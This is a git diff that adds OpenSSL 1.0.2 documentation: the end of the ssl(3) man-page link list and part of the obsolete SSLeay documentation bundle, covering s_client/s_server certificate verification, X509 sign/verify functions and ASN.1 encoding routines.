+L<SSL_CTX_set_msg_callback(3)|SSL_CTX_set_msg_callback(3)>,
+L<SSL_CTX_set_options(3)|SSL_CTX_set_options(3)>,
+L<SSL_CTX_set_quiet_shutdown(3)|SSL_CTX_set_quiet_shutdown(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_CTX_set_session_id_context(3)|SSL_CTX_set_session_id_context(3)>,
+L<SSL_CTX_set_ssl_version(3)|SSL_CTX_set_ssl_version(3)>,
+L<SSL_CTX_set_timeout(3)|SSL_CTX_set_timeout(3)>,
+L<SSL_CTX_set_tmp_rsa_callback(3)|SSL_CTX_set_tmp_rsa_callback(3)>,
+L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>,
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>,
+L<SSL_CTX_use_certificate(3)|SSL_CTX_use_certificate(3)>,
+L<SSL_alert_type_string(3)|SSL_alert_type_string(3)>,
+L<SSL_do_handshake(3)|SSL_do_handshake(3)>,
+L<SSL_get_SSL_CTX(3)|SSL_get_SSL_CTX(3)>,
+L<SSL_get_ciphers(3)|SSL_get_ciphers(3)>,
+L<SSL_get_client_CA_list(3)|SSL_get_client_CA_list(3)>,
+L<SSL_get_default_timeout(3)|SSL_get_default_timeout(3)>,
+L<SSL_get_error(3)|SSL_get_error(3)>,
+L<SSL_get_ex_data_X509_STORE_CTX_idx(3)|SSL_get_ex_data_X509_STORE_CTX_idx(3)>,
+L<SSL_get_ex_new_index(3)|SSL_get_ex_new_index(3)>,
+L<SSL_get_fd(3)|SSL_get_fd(3)>,
+L<SSL_get_peer_cert_chain(3)|SSL_get_peer_cert_chain(3)>,
+L<SSL_get_rbio(3)|SSL_get_rbio(3)>,
+L<SSL_get_session(3)|SSL_get_session(3)>,
+L<SSL_get_verify_result(3)|SSL_get_verify_result(3)>,
+L<SSL_get_version(3)|SSL_get_version(3)>,
+L<SSL_library_init(3)|SSL_library_init(3)>,
+L<SSL_load_client_CA_file(3)|SSL_load_client_CA_file(3)>,
+L<SSL_new(3)|SSL_new(3)>,
+L<SSL_pending(3)|SSL_pending(3)>,
+L<SSL_read(3)|SSL_read(3)>,
+L<SSL_rstate_string(3)|SSL_rstate_string(3)>,
+L<SSL_session_reused(3)|SSL_session_reused(3)>,
+L<SSL_set_bio(3)|SSL_set_bio(3)>,
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>,
+L<SSL_set_fd(3)|SSL_set_fd(3)>,
+L<SSL_set_session(3)|SSL_set_session(3)>,
+L<SSL_set_shutdown(3)|SSL_set_shutdown(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>,
+L<SSL_state_string(3)|SSL_state_string(3)>,
+L<SSL_want(3)|SSL_want(3)>,
+L<SSL_write(3)|SSL_write(3)>,
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>,
+L<SSL_SESSION_get_ex_new_index(3)|SSL_SESSION_get_ex_new_index(3)>,
+L<SSL_SESSION_get_time(3)|SSL_SESSION_get_time(3)>,
+L<d2i_SSL_SESSION(3)|d2i_SSL_SESSION(3)>,
+L<SSL_CTX_set_psk_client_callback(3)|SSL_CTX_set_psk_client_callback(3)>,
+L<SSL_CTX_use_psk_identity_hint(3)|SSL_CTX_use_psk_identity_hint(3)>,
+L<SSL_get_psk_identity(3)|SSL_get_psk_identity(3)>
+
+=head1 HISTORY
+
+The L<ssl(3)|ssl(3)> document appeared in OpenSSL 0.9.2
+
+=cut
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssleay.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssleay.txt
new file mode 100644
index 0000000..c9b29bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssleay.txt
@@ -0,0 +1,7030 @@
+
+Bundle of old SSLeay documentation files [OBSOLETE!]
+
+*** WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! ***
+
+OBSOLETE means that nothing in this document should be trusted.  This
+document is provided mostly for historical purposes (it wasn't even up
+to date at the time SSLeay 0.8.1 was released) and as inspiration.  If
+you copy some snippet of code from this document, please _check_ that
+it really is correct from all points of view.  For example, you can
+check with the other documents in this directory tree, or by comparing
+with relevant parts of the include files.
+
+People have done the mistake of trusting what's written here.  Please
+don't do that.
+
+*** WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! ***
+
+
+==== readme ========================================================
+
+This is the old 0.6.6 docuementation.  Most of the cipher stuff is still
+relevent but I'm working (very slowly) on new documentation.
+The current version can be found online at
+
+http://www.cryptsoft.com/ssleay/doc
+
+==== API.doc ========================================================
+
+SSL - SSLv2/v3/v23 etc.
+
+BIO - methods and how they plug together
+
+MEM - memory allocation callback
+
+CRYPTO - locking for threads
+
+EVP - Ciphers/Digests/signatures
+
+RSA - methods
+
+X509 - certificate retrieval
+
+X509 - validation
+
+X509 - X509v3 extensions
+
+Objects - adding object identifiers
+
+ASN.1 - parsing
+
+PEM - parsing
+
+==== ssl/readme =====================================================
+
+22 Jun 1996
+This file belongs in ../apps, but I'll leave it here because it deals
+with SSL :-)  It is rather dated but it gives you an idea of how
+things work.
+===
+
+17 Jul 1995
+I have been changing things quite a bit and have not fully updated
+this file, so take what you read with a grain of salt
+eric
+===
+The s_client and s_server programs can be used to test SSL capable
+IP/port addresses and the verification of the X509 certificates in use
+by these services.  I strongly advise having a look at the code to get
+an idea of how to use the authentication under SSLeay.  Any feedback
+on changes and improvements would be greatly accepted.
+
+This file will probably be gibberish unless you have read
+rfc1421, rfc1422, rfc1423 and rfc1424 which describe PEM
+authentication.
+
+A Brief outline (and examples) how to use them to do so.
+
+NOTE:
+The environment variable SSL_CIPER is used to specify the prefered
+cipher to use, play around with setting it's value to combinations of
+RC4-MD5, EXP-RC4-MD5, CBC-DES-MD5, CBC3-DES-MD5, CFB-DES-NULL
+in a : separated list.
+
+This directory contains 3 X509 certificates which can be used by these programs.
+client.pem: a file containing a certificate and private key to be used
+	by s_client.
+server.pem :a file containing a certificate and private key to be used
+	by s_server.
+eay1024.pem:the certificate used to sign client.pem and server.pem.
+	This would be your CA's certificate.  There is also a link
+	from the file a8556381.0 to eay1024.PEM.  The value a8556381
+	is returned by 'x509 -hash -noout <eay1024.pem' and is the
+	value used by X509 verification routines to 'find' this
+	certificte when search a directory for it.
+	[the above is not true any more, the CA cert is 
+	 ../certs/testca.pem which is signed by ../certs/mincomca.pem]
+
+When testing the s_server, you may get
+bind: Address already in use
+errors.  These indicate the port is still being held by the unix
+kernel and you are going to have to wait for it to let go of it.  If
+this is the case, remember to use the port commands on the s_server and
+s_client to talk on an alternative port.
+
+=====
+s_client.
+This program can be used to connect to any IP/hostname:port that is
+talking SSL.  Once connected, it will attempt to authenticate the
+certificate it was passed and if everything works as expected, a 2
+directional channel will be open.  Any text typed will be sent to the
+other end.  type Q<cr> to exit.  Flags are as follows.
+-host arg	: Arg is the host or IP address to connect to.
+-port arg	: Arg is the port to connect to (https is 443).
+-verify arg	: Turn on authentication of the server certificate.
+		: Arg specifies the 'depth', this will covered below.
+-cert arg	: The optional certificate to use.  This certificate
+		: will be returned to the server if the server
+		: requests it for client authentication.
+-key arg	: The private key that matches the certificate
+		: specified by the -cert option.  If this is not
+		: specified (but -cert is), the -cert file will be
+		: searched for the Private key.  Both files are
+		: assumed to be in PEM format.
+-CApath arg	: When to look for certificates when 'verifying' the
+		: certificate from the server.
+-CAfile arg	: A file containing certificates to be used for
+		: 'verifying' the server certificate.
+-reconnect	: Once a connection has been made, drop it and
+		: reconnect with same session-id.  This is for testing :-).
+
+The '-verify n' parameter specifies not only to verify the servers
+certificate but to also only take notice of 'n' levels.  The best way
+to explain is to show via examples.
+Given
+s_server -cert server.PEM is running.
+
+s_client
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+	issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify error:num=1:unable to get issuer certificate
+	verify return:1
+	CIPHER is CBC-DES-MD5
+What has happened is that the 'SSLeay demo server' certificate's
+issuer ('CA') could not be found but because verify is not on, we
+don't care and the connection has been made anyway.  It is now 'up'
+using CBC-DES-MD5 mode.  This is an unauthenticate secure channel.
+You may not be talking to the right person but the data going to them
+is encrypted.
+
+s_client -verify 0
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+	issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify error:num=1:unable to get issuer certificate
+	verify return:1
+	CIPHER is CBC-DES-MD5
+We are 'verifying' but only to depth 0, so since the 'SSLeay demo server'
+certificate passed the date and checksum, we are happy to proceed.
+
+s_client -verify 1
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+	issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify error:num=1:unable to get issuer certificate
+	verify return:0
+	ERROR
+	verify error:unable to get issuer certificate
+In this case we failed to make the connection because we could not
+authenticate the certificate because we could not find the
+'CA' certificate.
+
+s_client -verify 1 -CAfile eay1024.PEM
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+	verify return:1
+	depth=1 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify return:1
+	CIPHER is CBC-DES-MD5
+We loaded the certificates from the file eay1024.PEM.  Everything
+checked out and so we made the connection.
+
+s_client -verify 1 -CApath .
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+	verify return:1
+	depth=1 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify return:1
+	CIPHER is CBC-DES-MD5
+We looked in out local directory for issuer certificates and 'found'
+a8556381.0 and so everything is ok.
+
+It is worth noting that 'CA' is a self certified certificate.  If you
+are passed one of these, it will fail to 'verify' at depth 0 because
+we need to lookup the certifier of a certificate from some information
+that we trust and keep locally.
+
+SSL_CIPHER=CBC3-DES-MD5:RC4-MD5
+export SSL_CIPHER
+s_client -verify 10 -CApath . -reconnect
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+	verify return:1
+	depth=1 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify return:1
+	drop the connection and reconnect with the same session id
+	CIPHER is CBC3-DES-MD5
+This has done a full connection and then re-estabished it with the
+same session id but a new socket.  No RSA stuff occures on the second
+connection.  Note that we said we would prefer to use CBC3-DES-MD5
+encryption and so, since the server supports it, we are.
+
+=====
+s_server
+This program accepts SSL connections on a specified port
+Once connected, it will estabish an SSL connection and optionaly
+attempt to authenticate the client.  A 2 directional channel will be
+open.  Any text typed will be sent to the other end.  Type Q<cr> to exit.
+Flags are as follows.
+-port arg	: Arg is the port to listen on.
+-verify arg	: Turn on authentication of the client if they have a
+		: certificate.  Arg specifies the 'depth'.
+-Verify arg	: Turn on authentication of the client. If they don't
+		: have a valid certificate, drop the connection.
+-cert arg	: The certificate to use.  This certificate
+		: will be passed to the client.  If it is not
+		: specified, it will default to server.PEM
+-key arg	: The private key that matches the certificate
+		: specified by the -cert option.  If this is not
+		: specified (but -cert is), the -cert file will be
+		: searched for the Private key.  Both files are
+		: assumed to be in PEM format.  Default is server.PEM
+-CApath arg	: When to look for certificates when 'verifying' the
+		: certificate from the client.
+-CAfile arg	: A file containing certificates to be used for
+		: 'verifying' the client certificate.
+
+For the following 'demo'  I will specify the s_server command and
+the s_client command and then list the output from the s_server.
+s_server
+s_client
+	CONNECTED
+	CIPHER is CBC-DES-MD5
+Everything up and running
+
+s_server -verify 0
+s_client  
+	CONNECTED
+	CIPHER is CBC-DES-MD5
+Ok since no certificate was returned and we don't care.
+
+s_server -verify 0
+./s_client -cert client.PEM
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo client
+	issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify error:num=1:unable to get issuer certificate
+	verify return:1
+	CIPHER is CBC-DES-MD5
+Ok since we were only verifying to level 0
+
+s_server -verify 4
+s_client -cert client.PEM
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo client
+	issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify error:num=1:unable to get issuer certificate
+	verify return:0
+	ERROR
+	verify error:unable to get issuer certificate
+Bad because we could not authenticate the returned certificate.
+
+s_server -verify 4 -CApath .
+s_client -cert client.PEM
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo client
+	verify return:1
+	depth=1 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify return:1
+	CIPHER is CBC-DES-MD5
+Ok because we could authenticate the returned certificate :-).
+
+s_server -Verify 0 -CApath .
+s_client
+	CONNECTED
+	ERROR
+	SSL error:function is:REQUEST_CERTIFICATE
+		 :error is   :client end did not return a certificate
+Error because no certificate returned.
+
+s_server -Verify 4 -CApath .
+s_client -cert client.PEM
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo client
+	verify return:1
+	depth=1 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify return:1
+	CIPHER is CBC-DES-MD5
+Full authentication of the client.
+
+So in summary to do full authentication of both ends
+s_server -Verify 9 -CApath .
+s_client -cert client.PEM -CApath . -verify 9
+From the server side
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo client
+	verify return:1
+	depth=1 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify return:1
+	CIPHER is CBC-DES-MD5
+From the client side
+	CONNECTED
+	depth=0 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+	verify return:1
+	depth=1 /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+	verify return:1
+	CIPHER is CBC-DES-MD5
+
+For general probing of the 'internet https' servers for the
+distribution area, run
+s_client -host www.netscape.com -port 443 -verify 4 -CApath ../rsa/hash
+Then enter
+GET /
+and you should be talking to the https server on that host.
+
+www.rsa.com was refusing to respond to connections on 443 when I was
+testing.
+
+have fun :-).
+
+eric
+
+==== a_verify.doc ========================================================
+
+From eay@mincom.com Fri Oct  4 18:29:06 1996
+Received: by orb.mincom.oz.au id AA29080
+  (5.65c/IDA-1.4.4 for eay); Fri, 4 Oct 1996 08:29:07 +1000
+Date: Fri, 4 Oct 1996 08:29:06 +1000 (EST)
+From: Eric Young <eay@mincom.oz.au>
+X-Sender: eay@orb
+To: wplatzer <wplatzer@iaik.tu-graz.ac.at>
+Cc: Eric Young <eay@mincom.oz.au>, SSL Mailing List <ssl-users@mincom.com>
+Subject: Re: Netscape's Public Key
+In-Reply-To: <19961003134837.NTM0049@iaik.tu-graz.ac.at>
+Message-Id: <Pine.SOL.3.91.961004081346.8018K-100000@orb>
+Mime-Version: 1.0
+Content-Type: TEXT/PLAIN; charset=US-ASCII
+Status: RO
+X-Status: 
+
+On Thu, 3 Oct 1996, wplatzer wrote:
+> I get Public Key from Netscape (Gold 3.0b4), but cannot do anything
+> with it... It looks like (asn1parse):
+> 
+> 0:d=0 hl=3 l=180 cons: SEQUENCE
+> 3:d=1 hl=2 l= 96 cons: SEQUENCE
+> 5:d=2 hl=2 l= 92 cons: SEQUENCE
+> 7:d=3 hl=2 l= 13 cons: SEQUENCE
+> 9:d=4 hl=2 l= 9 prim: OBJECT :rsaEncryption
+> 20:d=4 hl=2 l= 0 prim: NULL
+> 22:d=3 hl=2 l= 75 prim: BIT STRING
+> 99:d=2 hl=2 l= 0 prim: IA5STRING :
+> 101:d=1 hl=2 l= 13 cons: SEQUENCE
+> 103:d=2 hl=2 l= 9 prim: OBJECT :md5withRSAEncryption
+> 114:d=2 hl=2 l= 0 prim: NULL
+> 116:d=1 hl=2 l= 65 prim: BIT STRING
+> 
+> The first BIT STRING is the public key and the second BIT STRING is 
+> the signature.
+> But a public key consists of the public exponent and the modulus. Are 
+> both numbers in the first BIT STRING?
+> Is there a document simply describing this coding stuff (checking 
+> signature, get the public key, etc.)?
+
+Minimal in SSLeay.  If you want to see what the modulus and exponent are,
+try asn1parse -offset 25 -length 75 <key.pem
+asn1parse will currently stuff up on the 'length 75' part (fixed in next 
+release) but it will print the stuff.  If you are after more 
+documentation on ASN.1, have a look at www.rsa.com and get their PKCS 
+documents, most of my initial work on SSLeay was done using them.
+
+As for SSLeay,
+util/crypto.num and util/ssl.num are lists of all exported functions in 
+the library (but not macros :-(.
+
+The ones for extracting public keys from certificates and certificate 
+requests are EVP_PKEY *      X509_REQ_extract_key(X509_REQ *req);
+EVP_PKEY *      X509_extract_key(X509 *x509);
+
+To verify a signature on a signed ASN.1 object
+int X509_verify(X509 *a,EVP_PKEY *key);
+int X509_REQ_verify(X509_REQ *a,EVP_PKEY *key);
+int X509_CRL_verify(X509_CRL *a,EVP_PKEY *key);
+int NETSCAPE_SPKI_verify(NETSCAPE_SPKI *a,EVP_PKEY *key);
+
+I should mention that EVP_PKEY can be used to hold a public or a private key,
+since for  things like RSA and DSS, a public key is just a subset of what 
+is stored for the private key.
+
+To sign any of the above structures
+
+int X509_sign(X509 *a,EVP_PKEY *key,EVP_MD *md);
+int X509_REQ_sign(X509_REQ *a,EVP_PKEY *key,EVP_MD *md);
+int X509_CRL_sign(X509_CRL *a,EVP_PKEY *key,EVP_MD *md);
+int NETSCAPE_SPKI_sign(NETSCAPE_SPKI *a,EVP_PKEY *key,EVP_MD *md);
+
+where md is the message digest to sign with.
+
+There are all defined in x509.h and all the _sign and _verify functions are
+actually macros to the ASN1_sign() and ASN1_verify() functions.
+These functions will put the correct algorithm identifiers in the correct 
+places in the structures.
+
+eric
+--
+Eric Young                  | BOOL is tri-state according to Bill Gates.
+AARNet: eay@mincom.oz.au    | RTFM Win32 GetMessage().
+
+==== x509 =======================================================
+
+X509_verify()
+X509_sign()
+
+X509_get_version()
+X509_get_serialNumber()
+X509_get_issuer()
+X509_get_subject()
+X509_get_notBefore()
+X509_get_notAfter()
+X509_get_pubkey()
+
+X509_set_version()
+X509_set_serialNumber()
+X509_set_issuer()
+X509_set_subject()
+X509_set_notBefore()
+X509_set_notAfter()
+X509_set_pubkey()
+
+X509_get_extensions()
+X509_set_extensions()
+
+X509_EXTENSIONS_clear()
+X509_EXTENSIONS_retrieve()
+X509_EXTENSIONS_add()
+X509_EXTENSIONS_delete()
+
+==== x509 attribute ================================================
+
+PKCS7
+	STACK of X509_ATTRIBUTES
+		ASN1_OBJECT
+		STACK of ASN1_TYPE
+
+So it is
+
+p7.xa[].obj
+p7.xa[].data[]
+
+get_obj_by_nid(STACK , nid)
+get_num_by_nid(STACK , nid)
+get_data_by_nid(STACK , nid, index)
+
+X509_ATTRIBUTE *X509_ATTRIBUTE_new(void );
+void		X509_ATTRIBUTE_free(X509_ATTRIBUTE *a);
+
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_NID(X509_ATTRIBUTE **ex,
+			int nid, STACK *value);
+
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_OBJ(X509_ATTRIBUTE **ex,
+			int nid, STACK *value);
+
+int		X509_ATTRIBUTE_set_object(X509_ATTRIBUTE *ex,ASN1_OBJECT *obj);
+int		X509_ATTRIBUTE_add_data(X509_ATTRIBUTE *ex, int index,
+			ASN1_TYPE *value);
+
+ASN1_OBJECT *	X509_ATTRIBUTE_get_object(X509_ATTRIBUTE *ex);
+int 		X509_ATTRIBUTE_get_num(X509_ATTRIBUTE *ne);
+ASN1_TYPE *	X509_ATTRIBUTE_get_data(X509_ATTRIBUTE *ne,int index);
+
+ASN1_TYPE *	X509_ATTRIBUTE_get_data_by_NID(X509_ATTRIBUTE *ne,
+			ASN1_OBJECT *obj);
+
+X509_ATTRIBUTE *PKCS7_get_s_att_by_NID(PKCS7 *p7,int nid);
+X509_ATTRIBUTE *PKCS7_get_u_att_by_NID(PKCS7 *p7,int nid);
+
+==== x509 v3 ========================================================
+
+The 'new' system.
+
+The X509_EXTENSION_METHOD includes extensions and attributes and/or names. 
+Basically everthing that can be added to an X509 with an OID identifying it.
+
+It operates via 2 methods per object id.
+int a2i_XXX(X509 *x,char *str,int len);
+int i2a_XXX(BIO *bp,X509 *x);
+
+The a2i_XXX function will add the object with a value converted from the
+string into the X509.  Len can be -1 in which case the length is calculated
+via strlen(str).   Applications can always use direct knowledge to load and
+unload the relevent objects themselves.
+
+i2a_XXX will print to the passed BIO, a text representation of the
+relevet object.  Use a memory BIO if you want it printed to a buffer :-).
+
+X509_add_by_NID(X509 *x,int nid,char *str,int len);
+X509_add_by_OBJ(X509 *x,ASN1_OBJECT *obj,char *str,int len);
+
+X509_print_by_name(BIO *bp,X509 *x);
+X509_print_by_NID(BIO *bp,X509 *x);
+X509_print_by_OBJ(BIO *bp,X509 *x);
+
+==== verify ========================================================
+
+X509_verify_cert_chain(
+	CERT_STORE *cert_store,
+	STACK /* X509 */ *certs,
+	int *verify_result,
+	int (*verify_error_callback)()
+	char *argument_to_callback, /* SSL */
+
+app_verify_callback(
+	char *app_verify_arg, /* from SSL_CTX */
+	STACK /* X509 */ *certs,
+	int *verify_result,
+	int (*verify_error_callback)()
+	SSL *s,
+
+int X509_verify_cert(
+	CERT_STORE *cert_store,
+	X509 *x509,
+	int *verify_result,
+	int (*verify_error_callback)(),
+	char *arg,
+
+==== apps.doc ========================================================
+
+The applications
+
+Ok, where to begin....
+In the begining, when SSLeay was small (April 1995), there
+were but few applications, they did happily cohabit in
+the one bin directory.  Then over time, they did multiply and grow,
+and they started to look like microsoft software; 500k to print 'hello world'.
+A new approach was needed.  They were coalessed into one 'Monolithic'
+application, ssleay.  This one program is composed of many programs that
+can all be compiled independantly.
+
+ssleay has 3 modes of operation.
+1) If the ssleay binary has the name of one of its component programs, it
+executes that program and then exits.  This can be achieved by using hard or
+symbolic links, or failing that, just renaming the binary.
+2) If the first argument to ssleay is the name of one of the component
+programs, that program runs that program and then exits.
+3) If there are no arguments, ssleay enters a 'command' mode.  Each line is
+interpreted as a program name plus arguments.  After each 'program' is run,
+ssleay returns to the comand line.
+
+dgst	- message digests
+enc	- encryption and base64 encoding
+
+ans1parse - 'pulls' appart ASN.1 encoded objects like certificates.
+
+dh	- Diffle-Hellman parameter manipulation.
+rsa	- RSA manipulations.
+crl	- Certificate revokion list manipulations
+x509	- X509 cert fiddles, including signing.
+pkcs7	- pkcs7 manipulation, only DER versions right now.
+
+genrsa	- generate an RSA private key.
+gendh	- Generate a set of Diffle-Hellman parameters.
+req	- Generate a PKCS#10 object, a certificate request.
+
+s_client - SSL client program
+s_server - SSL server program
+s_time	 - A SSL protocol timing program
+s_mult	 - Another SSL server, but it multiplexes
+	   connections.
+s_filter - under development
+
+errstr	- Convert SSLeay error numbers to strings.
+ca	- Sign certificate requests, and generate
+	  certificate revokion lists
+crl2pkcs7 - put a crl and certifcates into a pkcs7 object.
+speed	- Benchmark the ciphers.
+verify	- Check certificates
+hashdir - under development
+
+[ there a now a few more options, play with the program to see what they
+  are ]
+
+==== asn1.doc ========================================================
+
+The ASN.1 Routines.
+
+ASN.1 is a specification for how to encode structured 'data' in binary form.
+The approach I have take to the manipulation of structures and their encoding
+into ASN.1 is as follows.
+
+For each distinct structure there are 4 function of the following form
+TYPE *TYPE_new(void);
+void TYPE_free(TYPE *);
+TYPE *d2i_TYPE(TYPE **a,unsigned char **pp,long length);
+long i2d_TYPE(TYPE *a,unsigned char **pp); 	/* CHECK RETURN VALUE */
+
+where TYPE is the type of the 'object'.  The TYPE that have these functions
+can be in one of 2 forms, either the internal C malloc()ed data structure
+or in the DER (a variant of ASN.1 encoding) binary encoding which is just
+an array of unsigned bytes.  The 'i2d' functions converts from the internal
+form to the DER form and the 'd2i' functions convert from the DER form to
+the internal form.
+
+The 'new' function returns a malloc()ed version of the structure with all
+substructures either created or left as NULL pointers.  For 'optional'
+fields, they are normally left as NULL to indicate no value.  For variable
+size sub structures (often 'SET OF' or 'SEQUENCE OF' in ASN.1 syntax) the
+STACK data type is used to hold the values.  Have a read of stack.doc
+and have a look at the relevant header files to see what I mean.  If there
+is an error while malloc()ing the structure, NULL is returned.
+
+The 'free' function will free() all the sub components of a particular
+structure.  If any of those sub components have been 'removed', replace
+them with NULL pointers, the 'free' functions are tolerant of NULL fields.
+
+The 'd2i' function copies a binary representation into a C structure.  It
+operates as follows.  'a' is a pointer to a pointer to
+the structure to populate, 'pp' is a pointer to a pointer to where the DER
+byte string is located and 'length' is the length of the '*pp' data.
+If there are no errors, a pointer to the populated structure is returned.
+If there is an error, NULL is returned.  Errors can occur because of
+malloc() failures but normally they will be due to syntax errors in the DER
+encoded data being parsed. It is also an error if there was an
+attempt to read more that 'length' bytes from '*p'.  If
+everything works correctly, the value in '*p' is updated
+to point at the location just beyond where the DER
+structure was read from.  In this way, chained calls to 'd2i' type
+functions can be made, with the pointer into the 'data' array being
+'walked' along the input byte array.
+Depending on the value passed for 'a', different things will be done.  If
+'a' is NULL, a new structure will be malloc()ed and returned.  If '*a' is
+NULL, a new structure will be malloc()ed and put into '*a' and returned.
+If '*a' is not NULL, the structure in '*a' will be populated, or in the
+case of an error, free()ed and then returned.
+Having these semantics means that a structure
+can call a 'd2i' function to populate a field and if the field is currently
+NULL, the structure will be created.
+
+The 'i2d' function type is used to copy a C structure to a byte array.
+The parameter 'a' is the structure to convert and '*p' is where to put it.
+As for the 'd2i' type structure, 'p' is updated to point after the last
+byte written.  If p is NULL, no data is written.  The function also returns
+the number of bytes written.  Where this becomes useful is that if the
+function is called with a NULL 'p' value, the length is returned.  This can
+then be used to malloc() an array of bytes and then the same function can
+be recalled passing the malloced array to be written to. e.g.
+
+int len;
+unsigned char *bytes,*p;
+len=i2d_X509(x,NULL);	/* get the size of the ASN1 encoding of 'x' */
+if ((bytes=(unsigned char *)malloc(len)) == NULL)
+	goto err;
+p=bytes;
+i2d_X509(x,&p);
+
+Please note that a new variable, 'p' was passed to i2d_X509.  After the
+call to i2d_X509 p has been incremented by len bytes.
+
+Now the reason for this functional organisation is that it allows nested
+structures to be built up by calling these functions as required.  There
+are various macros used to help write the general 'i2d', 'd2i', 'new' and
+'free' functions.  They are discussed in another file and would only be
+used by some-one wanting to add new structures to the library.  As you
+might be able to guess, the process of writing ASN.1 files can be a bit CPU
+expensive for complex structures.  I'm willing to live with this since the
+simpler library code make my life easier and hopefully most programs using
+these routines will have their execution profiles dominated by cipher or
+message digest routines.
+What follows is a list of 'TYPE' values and the corresponding ASN.1
+structure and where it is used.
+
+TYPE			ASN.1
+ASN1_INTEGER		INTEGER
+ASN1_BIT_STRING		BIT STRING
+ASN1_OCTET_STRING	OCTET STRING
+ASN1_OBJECT		OBJECT IDENTIFIER
+ASN1_PRINTABLESTRING	PrintableString
+ASN1_T61STRING		T61String
+ASN1_IA5STRING		IA5String
+ASN1_UTCTIME		UTCTime
+ASN1_TYPE		Any of the above mentioned types plus SEQUENCE and SET
+
+Most of the above mentioned types are actualled stored in the
+ASN1_BIT_STRING type and macros are used to differentiate between them.
+The 3 types used are
+
+typedef struct asn1_object_st
+	{
+	/* both null if a dynamic ASN1_OBJECT, one is
+	 * defined if a 'static' ASN1_OBJECT */
+	char *sn,*ln;
+	int nid;
+	int length;
+	unsigned char *data;
+	} ASN1_OBJECT;
+This is used to store ASN1 OBJECTS.  Read 'objects.doc' for details ono
+routines to manipulate this structure.  'sn' and 'ln' are used to hold text
+strings that represent the object (short name and long or lower case name).
+These are used by the 'OBJ' library.  'nid' is a number used by the OBJ
+library to uniquely identify objects.  The ASN1 routines will populate the
+'length' and 'data' fields which will contain the bit string representing
+the object.
+
+typedef struct asn1_bit_string_st
+	{
+	int length;
+	int type;
+	unsigned char *data;
+	} ASN1_BIT_STRING;
+This structure is used to hold all the other base ASN1 types except for
+ASN1_UTCTIME (which is really just a 'char *').  Length is the number of
+bytes held in data and type is the ASN1 type of the object (there is a list
+in asn1.h).
+
+typedef struct asn1_type_st
+	{
+	int type;
+	union	{
+		char *ptr;
+		ASN1_INTEGER *		integer;
+		ASN1_BIT_STRING *	bit_string;
+		ASN1_OCTET_STRING *	octet_string;
+		ASN1_OBJECT *		object;
+		ASN1_PRINTABLESTRING *	printablestring;
+		ASN1_T61STRING *	t61string;
+		ASN1_IA5STRING *	ia5string;
+		ASN1_UTCTIME *		utctime;
+		ASN1_BIT_STRING *	set;
+		ASN1_BIT_STRING *	sequence;
+		} value;
+	} ASN1_TYPE;
+This structure is used in a few places when 'any' type of object can be
+expected.
+
+X509			Certificate
+X509_CINF		CertificateInfo
+X509_ALGOR		AlgorithmIdentifier
+X509_NAME		Name			
+X509_NAME_ENTRY		A single sub component of the name.
+X509_VAL		Validity
+X509_PUBKEY		SubjectPublicKeyInfo
+The above mentioned types are declared in x509.h. They are all quite
+straight forward except for the X509_NAME/X509_NAME_ENTRY pair.
+A X509_NAME is a STACK (see stack.doc) of X509_NAME_ENTRY's.
